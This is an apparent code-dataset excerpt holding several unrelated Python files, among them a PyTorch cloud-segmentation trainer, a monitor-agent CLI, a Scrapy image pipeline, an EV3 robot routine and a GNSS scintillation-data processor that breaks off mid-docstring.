text stringlengths 38 1.54M |
|---|
import os
import torch
from torch import nn
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
import torch.optim as optim
from torchsummary import summary
import segmentation_models_pytorch as smp
from catalyst.dl.runner import SupervisedRunner
from catalyst.dl.callbacks import DiceCallback, EarlyStoppingCallback, InferCallback, CheckpointCallback
from catalyst.dl import utils
from datasets.dataset_38_cloud import get_preprocessing, get_training_augmentation, get_validation_augmentation, \
L8CLoudDataset
from transforms.utils import get_transform
from models.utils import get_model
from calc.trainer import acc_metric, train_org
def main():
    """Train a cloud-segmentation model on the 38-Cloud Kaggle dataset.

    Flat configuration at the top, then: transforms -> dataset ->
    train/val split -> dataloaders -> model -> loss/optimizer ->
    TensorBoard logging -> training via `train_org`.
    """
    # general
    debug = False
    epochs = 10
    batch_size = 6
    num_workers = 0  # single-process loading; presumably for debuggability — TODO confirm
    lr = 0.01
    # dataset
    base_dir = '/dataset/kaggle/38-cloud'
    datatype_train = 'train'  # 'test'
    datatype_test = 'test'  # NOTE(review): unused here; prediction block below is commented out
    include_nir = True  # 4th input channel (near-infrared)
    train_ratio = 0.8
    # transforms
    name_trans_train = 'albu_train_0'
    name_trans_val = 'albu_val_0'  # NOTE(review): unused; validation uses the training transform
    kwargs_trans = {
        'resize': None  # (384, 384)
    }
    name_preprocessing = 'xxxx'  # NOTE(review): placeholder, unused
    # model
    model_name = 'unet_smp'  # 'unet_0' #'segnet' #'unet_0'
    # out_channels = 2
    # kwargs_model = {
    #     'out_channels': 2,
    #     'in_channels': 4
    # }
    # smp-style models take `classes` rather than `out_channels`
    kwargs_model = {
        'classes': 2,
        'in_channels': 4
    }
    resume = None  # path to a state_dict checkpoint to resume from, or None
    # log
    log_base_dir = os.path.join("./logs/38_cloud_test", model_name)
    non_null_rate = 1.0
    cloud_rate = None
    processes = 12
    # let cuDNN benchmark conv algorithms (fixed-size inputs assumed)
    torch.backends.cudnn.benchmark = True
    if debug:
        device = 'cpu'
    else:
        device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    # transform
    transforms_train = get_transform(name=name_trans_train, **kwargs_trans)
    # preprocessing
    preprocessing = None
    # ENCODER = 'resnet50'
    # ENCODER_WEIGHTS = 'imagenet'
    # preprocessing_fn = smp.encoders.get_preprocessing_fn(ENCODER, ENCODER_WEIGHTS)
    # preprocessing = get_preprocessing(preprocessing_fn=preprocessing_fn)
    # dataset
    dataset = L8CLoudDataset(base_dir=base_dir, datatype=datatype_train, transforms=transforms_train,
                             preprocessing=preprocessing, include_nir=include_nir,
                             non_null_rate=non_null_rate,
                             cloud_rate=cloud_rate,
                             processes=processes)
    # divide training set and validation set
    n_samples = len(dataset)  # n_samples is 60000
    train_size = int(len(dataset) * train_ratio)  # train_size is 48000
    val_size = n_samples - train_size
    train_ds, valid_ds = torch.utils.data.random_split(dataset, [train_size, val_size])
    # DataLoader
    train_dl = DataLoader(train_ds, batch_size=batch_size, shuffle=True, num_workers=num_workers)
    valid_dl = DataLoader(valid_ds, batch_size=batch_size, shuffle=False, num_workers=num_workers)
    # NOTE(review): `loaders` (Catalyst-style dict) is built but unused — see todos below
    loaders = {
        "train": train_dl,
        "valid": valid_dl
    }
    # model
    model = get_model(name=model_name, **kwargs_model)
    model.to(device)
    if resume is not None:
        model.load_state_dict(torch.load(resume, map_location=device))
    # check model: one batch's shapes plus a torchsummary dump
    xb, yb = next(iter(train_dl))
    print(xb.shape, yb.shape)
    print(model)
    print(summary(model, input_size=tuple(xb.shape[1:])))
    # loss
    criterion = nn.CrossEntropyLoss().to(device)
    # optim and lr scheduler
    optimizer = torch.optim.Adam(model.parameters(), lr=lr)
    lr_scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.1)
    # scheduler = ReduceLROnPlateau(optimizer, factor=0.15, patience=2)
    # log
    tb_log_dir = os.path.join(log_base_dir, "tb")
    dir_ckp = os.path.join(log_base_dir, "checkpoints")
    if not os.path.exists(dir_ckp):
        os.makedirs(dir_ckp)
    # Tensorboard
    writer = SummaryWriter(log_dir=tb_log_dir)
    # display some examples in tensorboard
    images, labels = next(iter(train_dl))
    # originals = images * std.view(3, 1, 1) + mean.view(3, 1, 1)
    # only the first 3 channels are logged as an image (NIR dropped for display)
    writer.add_images('images/original', images[:, :3, ...], 0)
    # writer.add_images('images/normalized', images, 0)
    writer.add_graph(model, images.to(device))
    # train
    # normal pytorch procedure
    # todo: check Satorch and save results
    train_loss, valid_loss = train_org(model, train_dl, valid_dl, criterion, optimizer, device, acc_metric, dir_ckp,
                                       scheduler=lr_scheduler, epochs=epochs, writer=writer)
    # # pred todo: this should be moved to other code
    # # dataset
    # dataset = L8CLoudDataset(base_dir=base_dir, datatype=datatype_test, transforms=transforms_train,
    #                          preprocessing=preprocessing, include_nir=include_nir,
    #                          non_null_rate=non_null_rate,
    #                          cloud_rate=cloud_rate,
    #                          processes=processes)
    # todo: Catalyst
    # todo: Catalyst with smp
    # todo: ignite ???
    print(train_loss)
    print(valid_loss)
    # todo: pred
    # todo: check accuracy measure
# Script entry point.
if __name__ == "__main__":
    main()
|
#!/usr/bin/python
__author__="Paulo Victor Maluf"
__date__ ="$27/10/2014 13:35:12$"
from connection import Connect;
class Postgres(object):
    """Thin convenience wrapper around a PostgreSQL connection.

    Parameters
    ----------
    dsn : str, optional
        Data source name forwarded to ``Connect``.
    """

    def __init__(self, dsn=None):
        self.dsn = dsn
        self.connect()

    def connect(self):
        """Open the connection and keep a cursor on it.

        BUG FIX: the connection used to be a local variable, so nothing
        kept it alive; it is now stored on the instance alongside the
        cursor.
        """
        self.conn = Connect(self.dsn)
        self.cursor = self.conn.cur()

    def exec_sql(self, sql):
        """Execute ``sql`` and return all fetched rows."""
        self.cursor.execute(sql)
        return self.cursor.fetchall()

    def __del__(self):
        # BUG FIX: the original `del self` only unbound the local name —
        # a no-op.  Do a best-effort cursor cleanup instead; failures
        # during interpreter shutdown are deliberately ignored.
        try:
            self.cursor.close()
        except Exception:
            pass
|
# 經由亂數發撲克牌(52張),分為四組列印出來。
import random
# Suits and ranks used to build a standard 52-card deck.
list_four_suits = ['♠', '♥', '♦', '♣']
list_number = ['A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']
def produce_poker_list(suits=None, numbers=None):
    """Build a deck as a list of suit+rank strings.

    Generalized (backward-compatibly): defaults to the module-level
    52-card configuration; pass custom `suits` / `numbers` to build a
    different deck.
    """
    if suits is None:
        suits = list_four_suits
    if numbers is None:
        numbers = list_number
    # Same ordering as the original nested loops: suit-major, rank-minor.
    return [suit + rank for suit in suits for rank in numbers]
def shuffle(list_poker):
shuffled_poker = []
for i in range(len(list_poker)-1, -1, -1):
pick_poker = random.randint(0, i)
shuffled_poker.append(list_poker[pick_poker])
list_poker[i], list_poker[pick_poker] = list_poker[pick_poker], list_poker[i]
return shuffled_poker
def licensing_poker(shuffled_poker):
    """Deal `shuffled_poker` round-robin to four players and print each hand."""
    labels = ['player_1:\t', 'player_2:\t', 'player_3:\t', 'player_4:\t']
    hands = [[], [], [], []]
    # Card k goes to player k mod 4 — same dealing order as the
    # original if/elif chain.
    for pos, card in enumerate(shuffled_poker):
        hands[pos % len(labels)].append(card)
    for label, hand in zip(labels, hands):
        print('{}{}'.format(label, hand))
def main():
    """Entry point: build a deck, shuffle it, deal and print four hands."""
    licensing_poker(shuffle(produce_poker_list()))

# NOTE(review): runs at import time — there is no __main__ guard here.
main()
######################################
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
#__author__="lili36"
#__date__="2017-03-24"
######################################
"""
This module provide argv implementation
"""
import os
import sys
import logging
import json
from optparse import OptionParser
from optparse import IndentedHelpFormatter
from load_config import Config
from monitor_start import MonitorAgentStart
"""
import modules
"""
import modules
# Module-wide logging: INFO and above to ../log/Command.log, with
# timestamp, level, message and source location.
logging.basicConfig(filename='../log/Command.log',
                    level=logging.INFO,
                    format='%(asctime)s %(levelname)s : %(message)s '
                           ' - %(filename)s: line %(lineno)d'
                    , datefmt='[%d/%b/%Y %H:%M:%S]')
class Command(object):
    """Base command: owns an OptionParser and overlays parsed directory
    options onto the global Config.

    Subclasses register extra options in __init__ and override
    validate()/execute().
    """
    def __init__(self, usage):
        """
        Initialization some value
        self.args: additional argv
        """
        formatter = IndentedHelpFormatter(max_help_position=400, width=800)
        if usage is not None:
            self.parser = OptionParser(formatter=formatter, usage=usage)
        else:
            self.parser = OptionParser(formatter=formatter)
        # Help strings fixed: each option now describes its own directory
        # (the originals were copy-paste mismatched).
        self.parser.add_option('', "--conf_dir", help='specified the conf dir.')
        self.parser.add_option('', "--log_dir", help='specified the log dir.')
        self.parser.add_option('', "--modules_dir", help='specified the modules dir.')
        self.parser.add_option('', "--strategy_pub_dir", help='specified the public strategy dir.')
        self.parser.add_option('', "--strategy_pri_dir", help='specified the private strategy dir.')
        self.args = ''

    def set_args(self, args):
        """set additional value"""
        self.args = args

    def validate(self, options, args):
        """object check method (hook for subclasses)"""
        pass

    def execute(self):
        """Parse self.args and overlay any supplied directories onto Config."""
        (options, args) = self.parser.parse_args(self.args)
        Config.conf_dir = Config.conf_dir if options.conf_dir is None else options.conf_dir
        Config.log_dir = Config.log_dir if options.log_dir is None else options.log_dir
        Config.modules_dir = Config.modules_dir if options.modules_dir is None else options.modules_dir
        # BUG FIX: the originals read options.strategy_public_dir /
        # options.strategy_private_dir — attributes that do not exist on
        # the optparse result (the options are --strategy_pub_dir /
        # --strategy_pri_dir), so passing either flag raised AttributeError.
        Config.strategy_public_dir = Config.strategy_public_dir if options.strategy_pub_dir is None else options.strategy_pub_dir
        Config.strategy_private_dir = Config.strategy_private_dir if options.strategy_pri_dir is None else options.strategy_pri_dir
        return True
class MonAgentStart(Command):
    """start monitor agent"""
    def __init__(self, usage=None):
        super(MonAgentStart, self).__init__(usage)

    """check method"""
    def validate(self, options, args):
        # Always accepts; placeholder for real argument checks.
        return True

    """execute method"""
    def execute(self):
        # Parse argv, apply directory overrides (base class), then start.
        (options, args) = self.parser.parse_args(self.args)
        if not self.validate(options, args):
            self.parser.print_help()
            return False
        super(MonAgentStart, self).execute()
        monitor_start_instance = MonitorAgentStart()
        # NOTE(review): process_list is collected but never used or returned.
        process_list=monitor_start_instance.kutype_mon_start()
        print 'monitor agent start method'
class MonAgentStop(Command):
    """stop monitor agent"""
    def __init__(self, usage=None):
        super(MonAgentStop, self).__init__(usage)
        # Extra flag on top of the base directory options.
        self.parser.add_option('-F', '--force', action='store_true',\
            dest='force', help='force stop monitor.')

    def validate(self, options, args):
        # Always accepts; placeholder for real argument checks.
        return True

    def execute(self):
        # Parse argv, apply directory overrides (base class), then stop.
        (options, args) = self.parser.parse_args(self.args)
        if not self.validate(options, args):
            self.parser.print_help()
            return False
        super(MonAgentStop, self).execute()
        print 'monitor agent stop method'
class MonAgentReload(Command):
    """reload conf """
    def __init__(self, usage=None):
        super(MonAgentReload, self).__init__(usage)

    def validate(self, options, args):
        # Always accepts; placeholder for real argument checks.
        return True

    def execute(self):
        # Parse argv, apply directory overrides (base class), then reload.
        (options, args) = self.parser.parse_args(self.args)
        if not self.validate(options, args):
            self.parser.print_help()
            return False
        super(MonAgentReload, self).execute()
        print 'monitor agent reload method'
class MonAgentRestart(Command):
    """restart monitor agent"""
    def __init__(self, usage=None):
        super(MonAgentRestart, self).__init__(usage)

    def validate(self, options, args):
        # Always accepts; placeholder for real argument checks.
        return True

    def execute(self):
        # Parse argv, apply directory overrides (base class), then restart.
        (options, args) = self.parser.parse_args(self.args)
        if not self.validate(options, args):
            self.parser.print_help()
            return False
        super(MonAgentRestart, self).execute()
        print 'monitor agent restart method'
class CheckConf(Command):
    """check register conf"""
    def __init__(self, usage=None):
        super(CheckConf, self).__init__(usage)

    def validate(self, options, args):
        # Always accepts; placeholder for real argument checks.
        return True

    def execute(self):
        # Parse argv, apply directory overrides (base class), then check.
        (options, args) = self.parser.parse_args(self.args)
        if not self.validate(options, args):
            self.parser.print_help()
            return False
        super(CheckConf, self).execute()
        print 'Check Conf method'
class Help(Command):
    """help info"""
    def __init__(self, usage=None, command_names=None, commands=None):
        # Deliberately does NOT call Command.__init__: Help builds its own
        # bare parser with no directory options.
        # NOTE(review): self.args is not initialized here; execute()
        # relies on set_args() having been called first — confirm callers.
        formatter = IndentedHelpFormatter(max_help_position=400, width=800)
        self.parser = OptionParser(formatter=formatter, usage=usage)
        if command_names is None:
            self.command_names = {}
            self.commands = {}
        else:
            self.command_names = command_names
            self.commands = commands
        self.usage = usage

    def execute(self):
        # With no positional argument: list all registered subcommands.
        # Otherwise: print each named command's own parser help.
        (options, args) = self.parser.parse_args(self.args)
        if len(args) == 0:
            print self.usage
            print '\nAvailable subcommands:'
            for command_name in self.command_names:
                print '\t%s' % command_name
            print ''
        for arg in args:
            if arg in self.commands:
                self.commands[arg].parser.print_help()
            else:
                print '"%s": unknown command.' % arg
            print ''
        return True
if __name__ == "__main__":
    # Debug entry: load the register conf and print the kutype build count.
    debug_instance = Config()
    json_fd = debug_instance.load_register_conf()
    print int(json_fd['build']['kutype_num'])
|
# Task: the sum of the least-significant digit of the integer part and
# the most-significant digit of the fractional part of x is an even
# number, or the 1st digit of the integer part is greater than the 1st
# digit of the fractional part.
def is_special(a):
    """Return True when the task's condition holds for the float `a`.

    NOTE: extracting the fractional digit via int(a * 10) is subject to
    binary floating-point rounding for some inputs (e.g. 14.2 * 10 is
    141.999...), as in the original approach.
    """
    low_int_digit = int(a) % 10        # least-significant digit of the integer part
    top_frac_digit = int(a * 10) % 10  # most-significant digit of the fractional part
    return (low_int_digit + top_frac_digit) % 2 == 0 or low_int_digit > top_frac_digit


if __name__ == "__main__":
    # BUG FIX: the original computed b = a % 10 and c = (a * 10) % 10 as
    # floats (keeping the fractional part) and tested (a + b) % 2 instead
    # of (b + c) % 2, so it never implemented the stated task.
    print(is_special(float(input())))
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import os
from urllib.request import urlopen
# from scrapy.pipelines.images import ImagesPipeline
from imgdb import settings
class ImgdbPipeline(object):
    """Scrapy item pipeline that downloads each item's image to disk.

    Images are stored under <IMAGES_STORE>/<spider.name>/<url basename>.
    """

    def process_item(self, item, spider):
        """Download the item's image and return the item unchanged for
        the next pipeline stage.
        """
        # Per-spider storage directory.  BUG FIX: built with os.path.join
        # instead of a hand-assembled '\\'-separated (Windows-only) path.
        dir_path = os.path.join(settings.IMAGES_STORE, spider.name)
        print('dir_path', dir_path)
        if not os.path.exists(dir_path):
            os.makedirs(dir_path)
        # NOTE(review): item['image_urls'] is used as a single URL string
        # here (split('/')), not a list as the key name suggests.
        pic_url = item['image_urls']
        image_name = pic_url.split('/')[-1]
        # BUG FIX: context-manage the HTTP response as well as the file so
        # both are closed even on error (the original leaked the urlopen
        # handle and called close() redundantly inside the `with` block).
        with urlopen(pic_url) as conn, \
                open(os.path.join(dir_path, image_name), 'wb') as img_file:
            img_file.write(conn.read())
        return item
|
from django.contrib import admin
from .models import Address, Order, Table, Booking, Category, Product, ProductOrder
# Register your models here.
# Expose every model with the default ModelAdmin in the Django admin.
admin.site.register(Address)
admin.site.register(Order)
admin.site.register(Table)
admin.site.register(Booking)
admin.site.register(Category)
admin.site.register(Product)
admin.site.register(ProductOrder)
|
from robot import Pid, Robot, LineEdge, LineSensor
from pybricks.hubs import EV3Brick
from pybricks.ev3devices import (Motor, ColorSensor,
GyroSensor)
from pybricks.parameters import (Port, Stop, Direction, Color,
SoundFile, Button)
from pybricks.tools import wait, StopWatch
from pybricks.robotics import DriveBase
from pybricks.media.ev3dev import Font
def run(robot: Robot):
    """Mission routine: drive the bench mission, then return.

    Everything after the bare `return` (the slide mission) is currently
    unreachable — apparently disabled on purpose; remove the `return`
    to re-enable it.
    """
    # PID controllers tuned for the different manoeuvre types.
    straight_line_follow_pid = Pid(1.5, 0, 10)
    sharp_line_follow_pid = Pid(5, 0, 0)  # NOTE(review): unused in this run
    turn_pid = Pid(10, 0, 5)
    slow_turn_pid = Pid(3, 0, 0)  # NOTE(review): unused in this run
    drive_pid = Pid(1, 0, 0)
    robot.reset_sensors()
    brick = EV3Brick()
    brick_buttons = brick.buttons.pressed()  # NOTE(review): unused
    # Bench mission.
    robot.drive(drive_pid, 200, 0, 2000)
    robot.drive(drive_pid, 80, 0, 1000)
    robot.move_linear(800, 3.6, False)
    robot.drive(drive_pid, -200, 0, 1200)
    return
    # --- unreachable below this point ---
    # Wait for any button press, then its release, before the slide run.
    while not any(brick.buttons.pressed()):
        wait(10)
    while any(brick.buttons.pressed()):
        wait(10)
    #Slide code, run directly after bench
    robot.reset_sensors()
    robot.move_linear(800, 1)
    robot.drive(drive_pid, 200, 0, 300)
    robot.turn(turn_pid, 80)
    robot.drive(drive_pid, 200, 80, 1400)
    robot.follow_line(straight_line_follow_pid, 100, 1750, LineSensor.LEFT, LineEdge.LEFT)
    robot.turn(turn_pid, 60)
    robot.drive(drive_pid, 200, 60, 1400)
    robot.drive(drive_pid, -100, 60, 1400)
    wait(500)
    robot.drive(drive_pid, -200, 60, 1200)
    robot.turn(turn_pid, -90)
    robot.drive(drive_pid, 200, -90, 500)
    robot.move_linear(-800, 1)
    robot.stop_motors()
|
from matplotlib.dates import DateFormatter, HourLocator
from matplotlib.ticker import AutoMinorLocator
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import math as mt
import datetime
import glob
import csv
import os
class ProcessISMR():
    """Load Septentrio ISMR scintillation files into a pandas DataFrame
    and normalize them: UTC-time index, PRN labels, typed columns,
    elevation-based filtering and quick plots."""
    def __init__(self):
        # NOTE(review): rough pi constant; does not appear to be used below.
        self.pi = 3.14

    # Read ISMR files
    def read_file(self, file_path):
        """
        Input file: ISMR file (*.ismr)
        """
        # NOTE(review): read_csv's `squeeze` parameter was removed in
        # pandas 2.0 — this code assumes an older pandas; confirm pin.
        self.df = pd.read_csv(file_path, header=None, squeeze=True)
        return self.df

    # Convert GPS time: week & seconds; to UTC time.
    # OJO: It's missing the leapseconds, this value is obtain from the navigation file
    def _GPS2UTCtime(self, row):
        # row[0] = GPS week number, row[1] = seconds of week (see normalize_df).
        leapseconds = 0 # change
        gpsweek = int(row[0])
        gpsseconds = int(row[1])
        datetimeformat = "%Y-%m-%d %H:%M:%S"
        first_epoch = datetime.datetime.strptime("1980-01-06 00:00:00",datetimeformat)
        elapsed = datetime.timedelta(days=(gpsweek*7),seconds=(gpsseconds-leapseconds))
        return first_epoch + elapsed

    # Convert SVID to PRN
    # The PRN codes were obtained from PolaRx5S Reference Guide
    def _get_PRN(self, row):
        # NOTE(review): row[1] is looked up on a row whose labels are
        # ["DateTime", 2, 3, ...] after normalize_df's deletions —
        # presumably resolved positionally by the pinned pandas; verify.
        svid = int(row[1])
        if 1<=svid<=37:
            prn = "G"+str(svid)
        elif 38<=svid<=61:
            prn = "R"+str(svid-37)
        elif svid==62:
            prn = "NA"
        elif 63<=svid<=68:
            prn = "R"+str(svid-38)
        elif 71<=svid<=106:
            prn = "E"+str(svid-70)
        elif 107<=svid<=119:
            prn = "NA"
        elif 120<=svid<=140:
            prn = "S"+str(svid-100)
        elif 141<=svid<=177:
            prn = "C"+str(svid-140)
        elif 181<=svid<=187:
            prn = "J"+str(svid-180)
        elif 191<=svid<=197:
            prn = "I"+str(svid-190)
        elif 198<=svid<=215:
            prn = "S"+str(svid-157)
        elif 216<=svid<=222:
            prn = "I"+str(svid-208)
        else:
            prn = "svid not valid!"
        return prn

    # Change to UTC time and PRN
    def normalize_df(self):
        """
        Make the following changes:
        1) GPS time -> UTC time
        2) SVID -> PRN
        Output: df
        """
        # Change time
        newDate = self.df[[0,1]].apply(self._GPS2UTCtime, axis=1)
        self.df.insert(0,column="DateTime",value=0) # create new column
        self.df["DateTime"] = newDate
        del self.df[0]
        del self.df[1]
        # Change SVID to PRN
        self.df[2] = self.df.apply(self._get_PRN, axis=1)
        self.df.rename(columns={2:"PRN"}, inplace=True)
        # Datetime as index
        self.df.set_index("DateTime", inplace=True)
        return self.df

    def extract_columns(self, cols): # cols: list
        """Extract ["PRN"] + certain columns.
        Input: list,
        Output: df
        """
        col_values = ["PRN"] + cols
        self.df = self.df[col_values]
        return self.df

    def rename_column(self, currentColIndex, newColName):
        # Rename a single column in place.
        self.df.rename(columns={currentColIndex: newColName}, inplace=True)
        return 'Ok'

    def check_columnNames(self):
        """
        output: list
        """
        return list(self.df.columns)

    # Identify the available constellations
    def check_constelations(self):
        """output: list
        """
        const = self.df["PRN"].str[0].unique() # extract the first character of each cell
        return const

    # Convert to float
    def convert2float(self, cols):
        self.df[cols] = self.df[cols].astype('float')
        return 'Ok'

    # Filter data(S4, CN0) based on the angle of the elevation
    def filter_dataframe(self, col='CN0_sig1', on='Elev', threshold=35, new_col_name=['CN0_sig1_1', 'CN0_sig1_2']):
        """
        Filter the column 'col', based 'on' values from another column which has a certain
        'threshold'. The new filtered 'col' is named 'new_col_name'.
        OUTPUT: df, with 2 aditional columns based on the criteria. The first column has the values
        lower than the threshold, whereas the second column has values greater than the threshold.
        """
        # Aux function
        def filter_col(row):
            elev = row[0]
            cn0 = row[1]
            if elev < threshold:
                return [cn0, np.nan]
            else:
                return [np.nan, cn0]
        # Create 1 additional column with the filtered data
        df_aux = self.df[[on, col]].apply(filter_col, axis=1, result_type="expand")
        df_aux.rename(columns = {0:new_col_name[0], 1:new_col_name[1]}, inplace=True)
        self.df = pd.concat([self.df, df_aux], join='inner', axis=1)
        return 'Ok'

    # Plot a column, for each PRN
    def plot_fast(self, col): # col:str
        """Plot a column from a dataframe for each PRN
        """
        #self.df.set_index("DateTime", inplace=True)
        self.df.groupby("PRN")[col].plot(style='o-')
        plt.ylabel(col)
        plt.grid(which='both')
        plt.savefig(col+".png")
        return 'Ok'
class ProcessSBF(ProcessISMR):
    """
    It helps to process ascii SBF streams obtained from
    a SBF file and the tool sbf2asc.
    """
    def __init__(self):
        pass

    def read_measEpoch(self, file_path):
        """
        Read the MeasEpoch block ascii file. It contains
        CN0 (dB-Hz) data.
        -----
        INPUT: csv or txt file (*.txt)
        OUTPUT: df
        """
        self.input_file_path = file_path
        # Read file
        # NOTE(review): skiprows/usecols assume the fixed sbf2asc layout.
        self.df_cn = pd.read_csv(self.input_file_path, skiprows=[0,1,2,3,5], usecols=[0,1,9,11,17])
        # Rename columns
        self.df_cn.rename(columns={"MeasType":"Signal", "CN0_dBHz [dB-Hz]":"CN0"}, inplace=True)
        #
        return self.df_cn

    def read_channelStatus(self, file_path):
        """
        Read the ChannelStatus block ascii file. It contains
        elevation(º) data.
        -----
        INPUT: csv or txt file (*.txt)
        OUTPUT: df
        """
        self.input_file_path = file_path
        # Read file
        self.df_elv = pd.read_csv(self.input_file_path, skiprows=[0,1,2,3,5], usecols=[0,1,2,14])
        # Rename columns
        self.df_elv.rename(columns={"Elevation [°]":"Elev"}, inplace=True)
        #
        return self.df_elv

    def _convert_freq2code(self):
        """
        Convert frequency to signal code. Review ISMR structure to
        know the signal codes.
        e.g. GPS_L1CA -> Sig1
        OJO: Only GPS, GALILEO & SBAS constellations are considered
            in order to save time. Uncomment another constellation
            if you need it.
        INPUT: df, with column "Signal" and others.
        OUTPUT: df
        """
        def get_CN0code(signal):
            # signal e.g. "GPS_L1CA" -> const="GPS", freq="L1CA"
            signal = signal.split("_")
            const = signal[0]
            try:
                freq = signal[1]
            except LookupError:
                return np.nan
            #
            if const == "GPS":
                if freq == "L1CA": return "Sig1"
                elif freq == "L2C": return "Sig2"
                elif freq == "L5": return "Sig3"
                else: return np.nan
            elif const == "GAL":
                if freq == "L1BC": return "Sig1"
                elif freq == "E5a": return "Sig2"
                elif freq == "E5b": return "Sig3"
                else: return np.nan
            #elif const == "GLO":
            #    if freq == "L1CA": return "Sig1"
            #    elif freq == "L2C": return "Sig2"
            #    else: return np.nan
            #elif const == "BDS":
            #    if freq == "B1": return "Sig1"
            #    elif freq == "B2": return "Sig2"
            #    elif freq == "B3": return "Sig3"
            #    else: return np.nan
            elif const == "GEO": # SBAS
                if freq == "L1" or freq == "L1CA": return "Sig1"
                elif freq == "L5": return "Sig2"
                else: return np.nan
            #elif const == "QZS": # const name might change, verify!
            #    if freq == "L1CA": return "Sig1"
            #    elif freq == "L2C": return "Sig2"
            #    elif freq == "L5": return "Sig3"
            #    else: return np.nan
            #elif const == "IRN": # const name might change, verify!
            #    if freq == "B1": return "Sig1"
            #    else: return np.nan
            else: return np.nan
        self.df["Signal"] = self.df["Signal"].astype(str).apply(get_CN0code)
        # Drop nan values in "Signal" column
        self.df.dropna(subset=["Signal"], inplace=True)
        return self.df

    def get_ampElev(self):
        """
        Get a standar Amplitude-Elevation dataframe.
        INPUT: amp file, elev file
        OUTPUT: df
        """
        # Join dfs: CN0 and Elev
        self.df = self.df_cn.merge(self.df_elv, how='left', on=["TOW [s]", "WNc [w]", "SVID"])
        # Change freq_code (GPS_L1CA) to sig code (Sig1)
        self.df = self._convert_freq2code()
        # Convert GPS to UTC time
        self.df = self.GPS2UTCtime()
        # Decimation
        self.df = self._decimate_amplitude()
        # Divide 'Signal' column into 3 columns
        # Reindex
        self.df = self.df.reset_index().set_index(['DateTime', 'SVID', 'Signal']).sort_index()
        # Unstack
        self.df = self.df.unstack(level=-1)
        # Separate
        self.df = self.df.reset_index()
        self.df.set_index("DateTime", inplace=True)
        # Select the min elevation value
        self.df["Elev_"] = self.df["Elev"].apply(lambda x: np.nanmin(x), axis=1)
        del self.df[("Elev","Sig1")]
        del self.df[("Elev","Sig2")]
        del self.df[("Elev","Sig3")]
        # NOTE(review): set_axis(..., inplace=True) was removed in
        # pandas 2.0 — another sign this file pins an older pandas.
        self.df.set_axis(["PRN", "CN0_sig1", "CN0_sig2", "CN0_sig3", "Elev"], axis=1, inplace=True)
        # Sort values by "PRN"
        self.df = self.df.reset_index().sort_values(by=["PRN", "DateTime"]).set_index("DateTime")
        # Reorder columns
        columnsTitles = ['PRN', 'Elev', 'CN0_sig1', 'CN0_sig2','CN0_sig3']
        self.df = self.df.reindex(columns=columnsTitles)
        return self.df

    def inputFile_info(self):
        """
        Print input file information.
        """
        # Collect only the header rows of interest (1 and 2), then stop.
        with open(self.input_file_path, newline="") as f:
            reader = csv.reader(f)
            rows_target = [1,2]
            j = 0
            info = []
            for row in reader:
                if j <= max(rows_target):
                    if j in rows_target:
                        info += row
                else:
                    break
                j += 1
        info = "__FILE INFO________\n" + "\n".join(info) + "\n___________________"
        return print(info)

    def check_columns(self):
        """
        Print available column names
        """
        return print(self.df.columns)

    def select_columns(self, cols):
        # Keep only the positional columns in `cols`.
        self.df = self.df.iloc[:,cols]
        return self.df

    def filter_column(self, columnName="Signal", value="GPS_L1CA"):
        """
        Filter a 'value' from an specific 'columnName' of a df.
        INPUT: columnName, value
        OUTPUT: df
        """
        mask = self.df[columnName]==value
        self.df = self.df[mask]
        return self.df

    def power_intensity(self):
        """
        Get power intensity in dB, from IQ components.
        INPUT: df, with I and Q components
        """
        def intensity(row):
            # 10*log10(I^2 + Q^2)
            value_i = row[0]
            value_q = row[1]
            amplitude = value_i**2 + value_q**2
            return 10*mt.log10(amplitude) # dB
        self.df["Amp"] = self.df[["I","Q"]].apply(intensity,axis=1)
        return self.df

    def GPS2UTCtime(self):
        """
        Convert GPS (WN + TOW)
        INPUT: df (implicit)
        OUPUT: df
        """
        def gps2utc(row):
            # NOTE: column order here is TOW first, week second —
            # opposite of ProcessISMR._GPS2UTCtime.
            leapseconds = 0 # change
            gpsseconds = int(row[0])
            gpsweek = int(row[1])
            datetimeformat = "%Y-%m-%d %H:%M:%S"
            first_epoch = datetime.datetime.strptime("1980-01-06 00:00:00",datetimeformat)
            elapsed = datetime.timedelta(days=(gpsweek*7),seconds=(gpsseconds-leapseconds))
            return first_epoch + elapsed
        newDate = self.df.iloc[:,[0,1]].apply(gps2utc, axis=1)
        # Create a new column at position 0
        self.df.insert(0, column="DateTime", value=newDate)
        # Remove some columns
        del self.df["TOW [s]"]
        del self.df["WNc [w]"]
        # Set datetime as index
        self.df.set_index("DateTime", inplace=True)
        return self.df

    def _decimate_amplitude(self):
        """
        Decimate 2 samples per minute: min & max values.
        INPUT: df, with DateTime index and columns: SVID,
               Signal, CN0, Elev.
        OUTPUT: df
        """
        # Set multiindex
        self.df = self.df.reset_index().set_index(['SVID', 'Signal', 'DateTime']).sort_index()
        # Get max & min amplitude and elevation values over a 1m interval
        level_values = self.df.index.get_level_values
        self.df = (self.df.groupby([level_values(i) for i in [0,1]]
                   +[pd.Grouper(freq='T', level=-1)]).agg(["min", "max"]))
        # Flatten and rename columns
        index1 = self.df.columns.get_level_values(0)
        index2 = self.df.columns.get_level_values(1)
        new_columns = []
        for i in range(4):
            value = index1[i] + "_" + index2[i]
            new_columns.append(value)
        self.df.columns = new_columns
        # Reset index
        self.df = self.df.reset_index().set_index("DateTime").sort_index()
        # Merge min & max values in a single column, and decrease the T=30s
        # min
        df_min = self.df.iloc[:,[0,1,2,4]]
        df_min.rename(columns={"CN0_min":"CN0", "Elev_min": "Elev"}, inplace = True)
        # max
        df_max = self.df.iloc[:,[0,1,3,5]]
        df_max.rename(columns={"CN0_max":"CN0", "Elev_max": "Elev"}, inplace = True)
        # Add 30s to the index
        df_max.index += datetime.timedelta(seconds=30)
        # Join
        self.df = pd.concat([df_min, df_max])
        self.df.sort_index(inplace=True)
        # NOTE(review): sort_values below is not assigned nor inplace,
        # so its result is discarded — confirm intent.
        self.df.sort_values(by=["SVID","Signal"])
        return self.df

    def decimate_amplitude_aux(self):
        """
